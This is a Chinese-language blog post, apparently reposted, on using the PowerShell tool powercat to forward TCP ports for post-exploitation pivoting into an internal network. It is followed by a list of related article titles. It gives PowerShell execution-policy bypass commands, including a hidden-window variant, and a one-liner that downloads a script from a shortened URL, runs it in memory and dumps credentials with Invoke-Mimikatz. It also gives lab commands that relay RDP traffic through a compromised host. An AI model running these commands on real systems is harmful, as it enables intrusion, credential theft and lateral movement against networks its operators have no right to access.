powerCat进行常规tcp端口转发
实战中,我们也会遇到需要我们进行端口转发的情况,比如已经拿下的目标机1是在dmz区,而目标1所在内网的其他目标只能通过目标1去访问,这时候我们就需要端口转发或者代理来进行后渗透。这次就要介绍一个加强版的nc,基于powershell的后渗透工具
Powercat
下载地址:Lhttps://github.com/besimorhino/powercat
0x01 powercat准备
首先得改一下ps的执行脚本权限
Set-ExecutionPolicy Bypass
然后直接执行我们的powercat脚本即可。
也可以通过常规三种绕过执行策略的方式执行ps脚本
本地权限绕过
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
本地隐藏权限绕过执行脚本
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden(隐藏窗口) -File xxx.ps1
用IEX下载远程PS1脚本回来权限绕过执行
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"
所以,直接选择最简单的吧,也别下载了,直接远程权限绕过,在Powershell 中执行:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
可以看到Powercat已经成功执行了
0x02 使用powercat端口转发
先来看下参数
不过端口转发中我们只需要其中几个参数
命令解析:
-c 指定一个ip地址
-p 指定一个端口
-v 显示详情
-l 监听模式,用于入站链接
-p 本地端口号
-e 程序重定向,跟nc一毛一样
-v 显示详情
下面用实际例子来说明每个参数的作用
例子一:
环境: 192.168.190.135 windows2003开放了3389(目标机)
192.168.190.149 windows8 (攻击机)
将192.168.190.135上的3389服务流量转发到本地的9001端口,攻击机用到的命令为:
powercat -c 192.168.190.135 -p 3389 -v -r tcp:9001
然后连接本地的9001端口,可以发现是转发成功的。
例子二:
环境: 192.168.190.135 windows2003开放了3389(内网目标机)
192.168.190.151 windows8 (外网目标机)(与内网目标机处一个内网)
192.168.190.149 windows8 (攻击机)
Ps:假设攻击机拿下了外网目标机的权限,想进一步内网渗透但是不能直接访问内网目标机的3389服务,只能通过外网目标机访问内网目标机的3389服务。
外网目标机执行:
powercat -c 192.168.190.135 -p 3389 -v -r tcp:6666
(连接内网目标机的3389端口,将流程转到自己的6666端口)
攻击机执行:
powercat -c 192.168.190.151 -p 6666 -v -r tcp:1111
(连接外网目标机的6666端口,把流程转到本地的1111端口)
可以看到转发成功。
转载于:https://www.cnblogs.com/-qing-/p/10652351.html
powerCat进行常规tcp端口转发相关推荐
- Nginx支持TCP端口转发
Nginx支持TCP端口转发 有个接口是通过socket通信,对端服务器访问存在IP限制,只好通过跳板机,因为它具备访问对端服务器的权限.nginx1.9开始支持tcp层的转发,通过stream实现的 ...
- java实现端口映射_Java BIO实现TCP端口转发(端口映射)功能源码
开发环境及开发目标说明: 开发背景:为了网络的安全,工作的网络环境的变得比较复杂,很多主机的端口一定程度上的受到了保护,需要从能访问到的中间机器做跳转. 开发环境:JDK1.6 + Eclipse4. ...
- Nginx之TCP端口转发
场景:很多企业业务都在云上,数据库端口基本不会对外开放.开发.测试人员经常会有通过外网去访问数据库的需求,此时我们可以利用nginx的端口转发功能来实现. 前提条件 :Nginx实现TCP端口转发,需 ...
- SSH远程登录和TCP端口转发
文章目录 1. SSH远程登录 1.1 密码验证 1.2 公钥认证 1.2.1 生成密钥对 1.2.2 复制公钥到服务器 1.2.3 远程登录 2. TCP转发 2.1 JVM远程调试 Securit ...
- 轻量级 TCP 端口转发工具:rinetd
TCP 端口转发的工具太多了,如:SSH.iptables.firewall.ncat.socat.portmap 等,为什么要说 rinetd,因为它使用很简单,对于简单的小服务来说非常的友好. ...
- windows操作系统自带的TCP端口转发
假定需要通过192.168.1.8的14941端口连接192.168.1.118的1494端口,则需要在192.168.1.8主机的命令行输入如下语句 netsh interface ipv6 in ...
- 华为AnyOffice eSDK建立TCP端口转发隧道
华为为移动端接入提供了一整套的解决方案,就是AnyOffice,这套系统集成了VPN接入,应用商店,客户端设备管理等功能,是一个比较完善的平台.但是它提供的客户端SDK用起来很不方便,与其他厂商的VP ...
- 基于Qt实现的TCP端口数据转发服务器
对于Qt,比较喜欢qt的sdk框架,我也是用于做一些工作中用到的工具软件,基于qt的sdk做起来也比较快: 一.概述 今天要说的这个tcp端口转发服务器,主要是用于将监听端口的数据转发到另外一个服务器 ...
- 【转】实战 SSH 端口转发
本文转自:http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html,至于有什么用,懂的懂! 实战 SSH 端口转发 通 ...
最新文章
- opencv机器学习线性回归_机器学习入门1---简单线性回归
- placeholder调整颜色
- oss图片上传api_交互式核保系统:api明细:图片上传oss接口
- mysql周报内容范文_Mysql各种表格查询含实例,日报,周报,月报,时间差自动计算...
- java基础- 与null的区别
- centos 6.5配置apache php mysql_centos6.7下搭配apache php mysql环境
- 小D课堂 - 新版本微服务springcloud+Docker教程_5-03 feign结合hystrix断路器开发实战上...
- AIDE手机编程初级教程(零基础向) 3.2.2 设计欢迎页(补充)
- 外贸常用术语_常用的外贸术语及工具
- 区块链(BTC)学习总结1
- 小程序-微信账号绑定多个开发者权限
- 鲁大师历经18年的风雨后,又一重量级评测即将诞生
- Chain validation failed
- Bugku-CTF never give up
- 使用canal1.1.5让MySQL5.7同步到ES7.x
- 机器学习模型评估与预测
- csgo人机指令_CSGO指令:命令BOT前往指定位置
- 计算机操作员初级试题及答案,计算机操作员初级考试试题
- linux如何添加360网站卫士ip,360网站卫士新增CNAME接入方式 快速设置方便站长
- WPARAM与LPARAM 之区别
热门文章
- arduino定时器函数如何使用_excel如何使用函数公式来查找图片
- java map 输入 查询 修改_map的查询和修改方法
- linux转换vcf格式,如何使用awk分割vCard通讯录文件(.vcf)
- html 消息通知声音,ajax实现web页面的消息实时提醒时播放提示音
- java注解类型命名_第三十九条:注解优先于命名模式
- php socketconnect连接失败_PHP设计模式之模板方法模式
- python fieldnames_csvreader.fieldnames在python中未被识别为csv reader对象的属性
- multiprocessing.manager管理的对象需要加锁吗_Go: 内存管理和分配
- STM32F1笔记(十一)ADC
- python 示例_带有示例的Python date timetuple()方法